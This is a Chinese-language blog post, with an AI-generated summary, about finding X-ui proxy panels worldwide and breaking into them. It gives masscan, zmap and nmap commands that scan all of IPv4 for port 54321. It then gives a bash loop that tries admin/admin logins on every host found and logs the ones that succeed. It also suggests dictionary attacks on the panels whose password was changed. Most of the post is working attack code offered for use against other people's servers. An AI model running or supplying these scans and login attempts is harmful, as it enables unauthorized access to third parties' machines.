扫描X-ui弱密码

2023年8月4日#X-ui318

AI 生成的摘要

这段文字是关于在Debian或Ubuntu服务器上安装工具并进行扫描的指南。首先安装了nmap、zmap和masscan工具。然后使用masscan进行粗扫，将结果保存在scan.json文件中。接着使用zmap扫描指定端口并将结果保存在scan.log文件中。最后使用nmap进行扫描并将结果保存在scan.log文件中。接下来是关于弱口令登录的部分，使用一个脚本对开放默认端口54321的服务器进行逐一尝试登录。将可以弱口令登录的机器保存在week.log文件中，将改了密码的机器保存在all.log文件中。

准备#

Debian 或 Ubuntu 服务器

安装工具#

apt install -y nmap zmap masscan

粗扫#

masscan

masscan 0.0.0.0/0 -p54321 --banners --exclude 255.255.255.255 -oJ scan.json

zmap

zmap --target-port=54321 --output-file=scan.log

nmap

nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log

弱口令登录#

早年一些某 ui 的一键安装脚本采用 admin/admin 的弱密码，很多人都懒得改，因此可以针对开放默认端口 54321 的服务器逐一尝试登录

#!/bin/bash

for ip_ad in $(sed -nE  's/.*"ip": "([^"]+)".*/\1/p' scan.json); do
        if curl --max-time 1 http://$ip_ad:54321; then
                res=$(curl "http://${ip_ad}:54321/login"  --data-raw 'username=admin&password=admin' --compressed  --insecure)
                if [[ "$res" =~ .*true.* ]]; then
                        echo $ip_ad | tee >> week.log
                fi
                echo $ip_ad | tee >> all.log
        fi
done;

week.log 里面就是所有扫出来的可以弱口令登录的机器，挺容易扫出来的
all.log 是改了密码的机器，有兴趣可以尝试进一步字典枚举